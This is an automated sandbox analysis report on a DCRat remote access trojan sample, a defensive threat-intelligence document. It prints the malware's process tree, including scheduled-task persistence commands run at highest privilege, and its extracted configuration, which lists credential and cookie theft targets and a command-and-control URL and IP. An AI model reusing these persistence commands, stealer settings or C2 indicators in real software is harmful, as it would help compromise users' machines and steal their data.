Edit tour

Windows Analysis Report
LaRHzSijsq.exe

Overview

General Information

Sample name:	LaRHzSijsq.exe renamed because original name is a hash value
Original sample name:	74f1fcf96c9e31f50f6d83072ec68d07.exe
Analysis ID:	1575246
MD5:	74f1fcf96c9e31f50f6d83072ec68d07
SHA1:	f05ada88e038fef51b6f0840084cd0f155faaa0e
SHA256:	4944035addbf7b1db7cf58fca9cda3050fbf87c3b5ca18dc124ceae5767a8bea
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Creates processes via WMI

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Protects its processes via BreakOnTermination flag

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious File Creation In Uncommon AppData Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

LaRHzSijsq.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\LaRHzSijsq.exe" MD5: 74F1FCF96C9E31F50F6D83072EC68D07)

conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ry0bqfj0.vyo.exe (PID: 7436 cmdline: "C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe" MD5: 24AB440AE1EE72BB5ABB8C40DBC4FF4C)

wscript.exe (PID: 7484 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinSattl\H4iFvhalfT9t12Rug.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 7584 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\WinSattl\9Jks4Q9248ljrax16iPG1ojfLKPqxh.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WinLatency.exe (PID: 7636 cmdline: "C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe" MD5: B26EA50DE8F1DA57B78E045EC904E19A)

schtasks.exe (PID: 7696 cmdline: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 8 /tr "'C:\Users\Default\AppData\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7712 cmdline: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgT" /sc ONLOGON /tr "'C:\Users\Default\AppData\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7728 cmdline: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 11 /tr "'C:\Users\Default\AppData\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7744 cmdline: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 6 /tr "'C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7760 cmdline: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgT" /sc ONLOGON /tr "'C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7776 cmdline: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 14 /tr "'C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7796 cmdline: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 7 /tr "'C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7812 cmdline: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgT" /sc ONLOGON /tr "'C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7828 cmdline: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 8 /tr "'C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7844 cmdline: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 8 /tr "'C:\Windows\Provisioning\Cosa\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7860 cmdline: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgT" /sc ONLOGON /tr "'C:\Windows\Provisioning\Cosa\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7876 cmdline: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 8 /tr "'C:\Windows\Provisioning\Cosa\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7896 cmdline: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\Registry.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7924 cmdline: schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\Registry.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7956 cmdline: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\Registry.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7972 cmdline: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 12 /tr "'C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7988 cmdline: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgT" /sc ONLOGON /tr "'C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8012 cmdline: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 9 /tr "'C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8028 cmdline: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 13 /tr "'C:\Windows\Tasks\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8048 cmdline: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgT" /sc ONLOGON /tr "'C:\Windows\Tasks\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8068 cmdline: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 11 /tr "'C:\Windows\Tasks\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8084 cmdline: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Multimedia Platform\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8100 cmdline: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgT" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8128 cmdline: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Multimedia Platform\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8152 cmdline: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 7 /tr "'C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8176 cmdline: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgT" /sc ONLOGON /tr "'C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5740 cmdline: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 13 /tr "'C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3684 cmdline: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Documents\My Videos\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2104 cmdline: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgT" /sc ONLOGON /tr "'C:\Users\Public\Documents\My Videos\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4548 cmdline: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Documents\My Videos\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 6036 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zLSKhC92h1.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

w32tm.exe (PID: 7292 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

Registry.exe (PID: 8144 cmdline: "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\Registry.exe" MD5: B26EA50DE8F1DA57B78E045EC904E19A)

Registry.exe (PID: 2568 cmdline: "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\Registry.exe" MD5: B26EA50DE8F1DA57B78E045EC904E19A)

UplbXNLOfTNXjbhPJQLmKdgT.exe (PID: 4412 cmdline: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe MD5: B26EA50DE8F1DA57B78E045EC904E19A)

UplbXNLOfTNXjbhPJQLmKdgT.exe (PID: 2872 cmdline: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe MD5: B26EA50DE8F1DA57B78E045EC904E19A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"Y\":\"#\",\"T\":\" \",\"C\":\"^\",\"V\":\")\",\"p\":\"!\",\"n\":\"`\",\"U\":\"&\",\"d\":\"<\",\"w\":\">\",\"R\":\";\",\"Z\":\"-\",\"0\":\"(\",\"5\":\"|\",\"N\":\",\",\"I\":\"*\",\"3\":\"_\",\"h\":\".\",\"v\":\"@\",\"l\":\"~\",\"D\":\"%\",\"9\":\"$\"}", "PCRT": "{\"9\":\"-\",\"G\":\",\",\"L\":\">\",\"0\":\"%\",\"d\":\"_\",\"F\":\"$\",\"B\":\";\",\"4\":\"#\",\"V\":\"&\",\"W\":\".\",\"Q\":\"`\",\"8\":\" \",\"t\":\"~\",\"j\":\"<\",\"U\":\"(\",\"N\":\"*\",\"J\":\"^\",\"n\":\"!\",\"m\":\"@\",\"K\":\"|\",\"R\":\")\"}", "TAG": "", "MUTEX": "DCR_MUTEX-N62p3D5R1AzNO8T2AwGb", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": true, "ignorepartiallyemptydata": true, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://ca91547.tw1.ru/@==gbJBzYuFDT", "H2": "http://ca91547.tw1.ru/@==gbJBzYuFDT", "T": "0"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
LaRHzSijsq.exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000026.00000002.4145617404.0000000002DE2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000026.00000002.4145617404.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000000.00000000.1689751552.00000000009B4000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000006.00000002.1880642049.0000000012F31000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000025.00000002.1967727670.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000026.00000002.4145617404.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000026.00000002.4145617404.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000020.00000002.1967465796.0000000002361000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000006.00000002.1878443146.00000000034C7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000026.00000002.4145617404.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000026.00000002.4145617404.0000000002C8A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000026.00000002.4145617404.0000000002C07000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000002.1742291548.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000006.00000002.1878443146.0000000002F21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000020.00000002.1967465796.000000000239F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000026.00000002.4145617404.0000000002F96000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000026.00000002.4145617404.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000026.00000002.4145617404.0000000002CA3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000023.00000002.1966435389.0000000002701000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: LaRHzSijsq.exe PID: 7272	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: WinLatency.exe PID: 7636	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: Registry.exe PID: 8144	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: Registry.exe PID: 2568	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: UplbXNLOfTNXjbhPJQLmKdgT.exe PID: 4412	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: UplbXNLOfTNXjbhPJQLmKdgT.exe PID: 2872	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
Process Memory Space: UplbXNLOfTNXjbhPJQLmKdgT.exe PID: 2872	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 21 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.LaRHzSijsq.exe.9b0000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinSattl\H4iFvhalfT9t12Rug.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinSattl\H4iFvhalfT9t12Rug.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe, ParentProcessId: 7436, ParentProcessName: ry0bqfj0.vyo.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinSattl\H4iFvhalfT9t12Rug.vbe" , ProcessId: 7484, ProcessName: wscript.exe

Sigma detected: Suspicious File Creation In Uncommon AppData Folder

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe, ProcessId: 7636, TargetFilename: C:\Users\Default\AppData\UplbXNLOfTNXjbhPJQLmKdgT.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinSattl\H4iFvhalfT9t12Rug.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinSattl\H4iFvhalfT9t12Rug.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe, ParentProcessId: 7436, ParentProcessName: ry0bqfj0.vyo.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinSattl\H4iFvhalfT9t12Rug.vbe" , ProcessId: 7484, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinSattl\H4iFvhalfT9t12Rug.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinSattl\H4iFvhalfT9t12Rug.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe, ParentProcessId: 7436, ParentProcessName: ry0bqfj0.vyo.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinSattl\H4iFvhalfT9t12Rug.vbe" , ProcessId: 7484, ProcessName: wscript.exe

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 8 /tr "'C:\Users\Default\AppData\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f, CommandLine: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 8 /tr "'C:\Users\Default\AppData\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe", ParentImage: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe, ParentProcessId: 7636, ParentProcessName: WinLatency.exe, ProcessCommandLine: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 8 /tr "'C:\Users\Default\AppData\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f, ProcessId: 7696, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Documents\My Videos\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f, CommandLine: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Documents\My Videos\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe", ParentImage: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe, ParentProcessId: 7636, ParentProcessName: WinLatency.exe, ProcessCommandLine: schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Documents\My Videos\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f, ProcessId: 3684, ProcessName: schtasks.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinSattl\H4iFvhalfT9t12Rug.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinSattl\H4iFvhalfT9t12Rug.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe, ParentProcessId: 7436, ParentProcessName: ry0bqfj0.vyo.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinSattl\H4iFvhalfT9t12Rug.vbe" , ProcessId: 7484, ProcessName: wscript.exe

Suricata Signatures

ET MALWARE DCRAT Activity (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-15T00:22:27.113354+0100	2034194	1	A Network Trojan was detected	192.168.2.4	49735	92.53.106.114	80	TCP

ETPRO MALWARE DCRat Initial Checkin Server Response M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-15T00:22:44.751641+0100	2850862	1	Malware Command and Control Activity Detected	92.53.106.114	80	192.168.2.4	49741	TCP
2024-12-15T00:23:45.557482+0100	2850862	1	Malware Command and Control Activity Detected	92.53.106.114	80	192.168.2.4	49842	TCP
2024-12-15T00:24:50.591728+0100	2850862	1	Malware Command and Control Activity Detected	92.53.106.114	80	192.168.2.4	50002	TCP
2024-12-15T00:25:53.944784+0100	2850862	1	Malware Command and Control Activity Detected	92.53.106.114	80	192.168.2.4	49986	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: LaRHzSijsq.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ca91547.tw1.ru/@==gbJBzYuFDT	Avira URL Cloud: Label: malware
